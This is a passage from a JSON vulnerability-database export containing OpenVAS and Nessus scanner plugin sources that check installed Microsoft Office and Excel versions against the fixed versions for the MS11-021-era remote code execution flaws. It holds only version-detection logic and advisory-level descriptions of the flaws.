\"URL\" , value : \"http://support.microsoft.com/kb/2466169\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2502786\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2466158\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/0940\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\",\n \"secpod_ms_office_detection_900025.nasl\");\n script_require_keys(\"SMB/Office/Excel/Version\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\n# Check for Office Excel 2002/2003/2007/2010\nexcelVer = get_kb_item(\"SMB/Office/Excel/Version\");\n\nif(excelVer =~ \"^(10|11|12|14)\\..*\")\n{\n # Check version Excel.exe\n if(version_in_range(version:excelVer, test_version:\"10.0\", test_version2:\"10.0.6868.0\") ||\n version_in_range(version:excelVer, test_version:\"11.0\", test_version2:\"11.0.8331.0\") ||\n version_in_range(version:excelVer, test_version:\"12.0\", test_version2:\"12.0.6550.5003\") ||\n version_in_range(version:excelVer, test_version:\"14.0\", test_version2:\"14.0.5130.5002\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n# Microsoft Office Excel Viewer 2007\nexcelVer = get_kb_item(name:\"SMB/Office/XLView/Version\");\nif(!isnull(excelVer))\n{\n # check for Xlview.exe version\n if(version_in_range(version:excelVer, test_version:\"12.0\", test_version2:\"12.0.6550.5003\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:40", "bulletinFamily": "scanner", "description": "This host is installed with Microsoft Office Excel and is prone to\n multiple remote code execution vulnerabilities.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902410.", "modified": "2018-11-22T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310801595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801595", "title": "Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_office_excel_mult_code_exec_vuln.nasl 12485 2018-11-22 11:39:45Z cfischer $\n#\n# Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801595\");\n script_version(\"$Revision: 12485 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-22 12:39:45 +0100 (Thu, 22 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0978\", \"CVE-2011-0979\");\n script_bugtraq_id(46225);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2011/Feb/86\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-042/\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-041/\");\n script_xref(name:\"URL\", value:\"http://permalink.gmane.org/gmane.comp.security.full-disclosure/77802\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\", \"secpod_ms_office_detection_900025.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\", \"SMB/Office/Excel/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code, can cause memory corruption and other attacks in the context of the\n application through crafted Excel file.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office Excel 2010\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error in the usage of a specific field used for incrementing an array\n index. The application will copy the contents of the specified element into\n a statically sized buffer on the stack.\n\n - An error in parsing Office Art record, when parsing an office art object\n record, if an error occurs, the application will add a stray reference to an\n element which is part of a linked list. When receiving a window message,\n the application will proceed to navigate this linked list. This will\n access a method from the malformed object which can lead to code execution\n under the context of the application.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Microsoft Office Excel and is prone to\n multiple remote code execution vulnerabilities.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902410.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-021.nasl.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-20T08:54:59", "bulletinFamily": "scanner", "description": "This host is installed with Microsoft Office Excel and is prone to\nmultiple remote code execution vulnerabilities.\n\nThis NVT has been replaced by NVT secpod_ms11-021.nasl\n(OID:1.3.6.1.4.1.25623.1.0.902410).", "modified": "2017-07-05T00:00:00", "published": "2011-02-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801595", "id": "OPENVAS:801595", "title": "Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_office_excel_mult_code_exec_vuln.nasl 6538 2017-07-05 11:38:27Z cfischer $\n#\n# Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\ncode, can cause memory corruption and other attacks in the context of the\napplication through crafted Excel file.\n\nImpact Level: System\";\n\ntag_affected = \"Microsoft Office Excel 2010\";\n\ntag_insight = \"The flaws are due to:\n- An error in the usage of a specific field used for incrementing an array\nindex. The application will copy the contents of the specified element into\na statically sized buffer on the stack.\n- An error in parsing Office Art record, when parsing an office art object\nrecord, if an error occurs, the application will add a stray reference to an\nelement which is part of a linked list. When receiving a window message,\nthe application will proceed to navigate this linked list. This will\naccess a method from the malformed object which can lead to code execution\nunder the context of the application.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is installed with Microsoft Office Excel and is prone to\nmultiple remote code execution vulnerabilities.\n\nThis NVT has been replaced by NVT secpod_ms11-021.nasl\n(OID:1.3.6.1.4.1.25623.1.0.902410).\";\n\nif(description)\n{\n script_id(801595);\n script_version(\"$Revision: 6538 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 13:38:27 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0978\", \"CVE-2011-0979\");\n script_bugtraq_id(46225);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/bugtraq/2011/Feb/86\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-11-042/\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-11-041/\");\n script_xref(name : \"URL\" , value : \"http://permalink.gmane.org/gmane.comp.security.full-disclosure/77802\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\", \"secpod_ms_office_detection_900025.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\", \"SMB/Office/Excel/Version\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-021.nasl.\n\n## check for microsoft office installation\nif(!get_kb_item(\"MS/Office/Ver\") =~ \"^14\\.*\"){\n exit(0);\n}\n\n## Get the ms office Excel version\nexcelVer = get_kb_item(\"SMB/Office/Excel/Version\");\n\n## Check for the MS office power point 2007\nif(excelVer && excelVer =~ \"^14\\.*\"){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:55:05", "bulletinFamily": "scanner", "description": "This host is installed with Microsoft Office Excel and is prone\nto multiple remote code execution vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms11-021.nasl\n(OID:1.3.6.1.4.1.25623.1.0.902410).", "modified": "2017-07-05T00:00:00", "published": "2011-02-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801597", "id": "OPENVAS:801597", "title": "Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_office_excel_art_object_code_exec_vuln.nasl 6538 2017-07-05 11:38:27Z cfischer $\n#\n# Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\ncodes, cause memory corruption and other attacks in the context of the\napplication through crafting malicious codes inside a Excel file.\n\nImpact Level: System\";\n\ntag_affected = \"Microsoft Office Excel 2003\";\n\ntag_insight = \"The flaw occurs when parsing a document with a malformed Excel\ndocument. When parsing an office art object, the application fails to put\nappropriate trust parameters.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is installed with Microsoft Office Excel and is prone\nto multiple remote code execution vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms11-021.nasl\n(OID:1.3.6.1.4.1.25623.1.0.902410).\";\n\nif(description)\n{\n script_id(801597);\n script_version(\"$Revision: 6538 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 13:38:27 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0980\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://zerodayinitiative.com/advisories/ZDI-11-043/\");\n script_xref(name : \"URL\" , value : \"http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-microsoft\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\", \"secpod_ms_office_detection_900025.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\", \"SMB/Office/Excel/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-021.nasl.\n\n## check for microsoft office installation\nif(!get_kb_item(\"MS/Office/Ver\") =~ \"^11\\.*\"){\n exit(0);\n}\n\n## Get the ms office Excel version\nexcelVer = get_kb_item(\"SMB/Office/Excel/Version\");\n\n## Check for the MS office power point 2003\nif(excelVer && excelVer =~ \"^11\\.*\"){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:48", "bulletinFamily": "scanner", "description": "This host is installed with Microsoft Office Excel and is prone\n to multiple remote code execution vulnerability.\n\n This NVT has been replaced by NVT (OID:1.3.6.1.4.1.25623.1.0.902410).", "modified": "2018-11-22T00:00:00", "published": "2011-02-23T00:00:00", "id": "OPENVAS:1361412562310801597", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801597", "title": "Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_office_excel_art_object_code_exec_vuln.nasl 12485 2018-11-22 11:39:45Z cfischer $\n#\n# Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801597\");\n script_version(\"$Revision: 12485 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-22 12:39:45 +0100 (Thu, 22 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0980\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-11-043/\");\n script_xref(name:\"URL\", value:\"http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-microsoft\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\", \"secpod_ms_office_detection_900025.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\", \"SMB/Office/Excel/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n codes, cause memory corruption and other attacks in the context of the\n application through crafting malicious codes inside a Excel file.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office Excel 2003\");\n\n script_tag(name:\"insight\", value:\"The flaw occurs when parsing a document with a malformed Excel\n document. When parsing an office art object, the application fails to put appropriate trust parameters.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Microsoft Office Excel and is prone\n to multiple remote code execution vulnerability.\n\n This NVT has been replaced by NVT (OID:1.3.6.1.4.1.25623.1.0.902410).\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-021.nasl.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-12-14T08:05:32", "bulletinFamily": "scanner", "description": "The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user", "modified": "2011-04-13T00:00:00", "id": "MACOSX_MS_OFFICE_APR2011.NASL", "href": "https://www.tenable.com/plugins/nessus/53374", "published": "2011-04-13T00:00:00", "title": "MS11-021 / MS11-022 / MS11-023: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2489279 / 2489283 / 2489293) (Mac OS X)", "type": "nessus", "sourceData": "#TRUSTED 43f52f1aa17cdc196450c02ba1deab6165a128d0b9f8a5bd69e18bf78a70d462e34e41d6a670935057c9836351dcf947f7044635b4b52d2558e094885c818a5cbfb7cdc52f356ab7b57862fbdd8328b3f1b56ce415d2098df4aa9d2d6ea4cefca832fe2bd709397d7596fddfa5dbf4197056e958107c394eec21ae5ba70895791b41af866e9851a5ccd9098a5399496a00de553d1634aa358bc86f7e3df05e7cb4a34a76b370d755a12639db9b4e1e069fa40a49c9fee5d095aa8095e4f3290ebb942694f5aa5b68b5447bba7b08f051fc5bb3d1d6a3dcbbffd5366df3e50a1c3fb0e2e74aae3f523f95a082b43fe6a7ce3f19dadc3bc87e7373e164b2dd5b087bcfda8c28722fba73d09b4fc730071e160cdc4703081a3209f0179a2a2a5b847157903e51411fd552c570362e453ae92bfb1e59392dbef41a89eb2441b32d3664b791963a4888274b1b9570ffd96bc11e87dca5511a45acd0277e84e30a755f8f84be79949f3b3a837a39ceed478709fcdb258490b26d04dd14206144025be43230c6219cc8dd45521a06a640d828ca8523005d9a10c13dc3c8ba1e26abf767f40383cfc23ba3003bb6a524f91df766187e79d4956ceb40a081da4d98deb22d397bbe1518dd6c7f1698f1d6f61de683bb24d2ade211976c0faeed26c39b1c0340c278544bbb1650779cbbc6374f437601f7a918abf6728f723e3313b0da2d31\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53374);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/12/13\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0655\",\n \"CVE-2011-0656\",\n \"CVE-2011-0976\",\n \"CVE-2011-0977\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(\n 46225,\n 46226,\n 46227,\n 46228,\n 46229,\n 47201,\n 47243,\n 47244,\n 47245,\n 47251,\n 47252\n );\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n script_xref(name:\"IAVA\", value:\"2011-A-0045\");\n script_xref(name:\"MSFT\", value:\"MS11-022\");\n script_xref(name:\"MSFT\", value:\"MS11-023\");\n script_xref(name:\"MSKB\", value:\"2489279\");\n script_xref(name:\"MSKB\", value:\"2489283\");\n script_xref(name:\"MSKB\", value:\"2489293\");\n script_xref(name:\"MSKB\", value:\"2505924\");\n script_xref(name:\"MSKB\", value:\"2505927\");\n script_xref(name:\"MSKB\", value:\"2505935\");\n script_xref(name:\"MSKB\", value:\"2525412\");\n\n script_name(english:\"MS11-021 / MS11-022 / MS11-023: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2489279 / 2489283 / 2489293) (Mac OS X)\");\n script_summary(english:\"Check version of Microsoft Office\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote Mac OS X host is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms11-021\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms11-022\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms11-023\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office for Mac 2011,\nOffice 2008 for Mac, Office 2004 for Mac, and Open XML File Format\nConverter for Mac.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2004::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2008::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2011::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:open_xml_file_format_converter:::mac\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(1, \"ssh_open_connection() failed.\");\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(1, \"The 'Host/MacOSX/packages' KB item is missing.\");\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(1, \"The 'Host/uname' KB item is missing.\");\nif (!egrep(pattern:\"Darwin.*\", string:uname)) exit(1, \"The host does not appear to be using the Darwin sub-system.\");\n\n\n# Gather version info.\ninfo = '';\ninstalls = make_array();\n\nprod = 'Office for Mac 2011';\nplist = \"/Applications/Microsoft Office 2011/Office/MicrosoftComponentPlugin.framework/Versions/14/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^14\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '14.1.0';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Office 2008 for Mac';\nplist = \"/Applications/Microsoft Office 2008/Office/MicrosoftComponentPlugin.framework/Versions/12/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^12\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '12.2.9';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Office 2004 for Mac';\ncmd = GetCarbonVersionCmd(file:\"Microsoft Component Plugin\", path:\"/Applications/Microsoft Office 2004/Office\");\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^11\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; 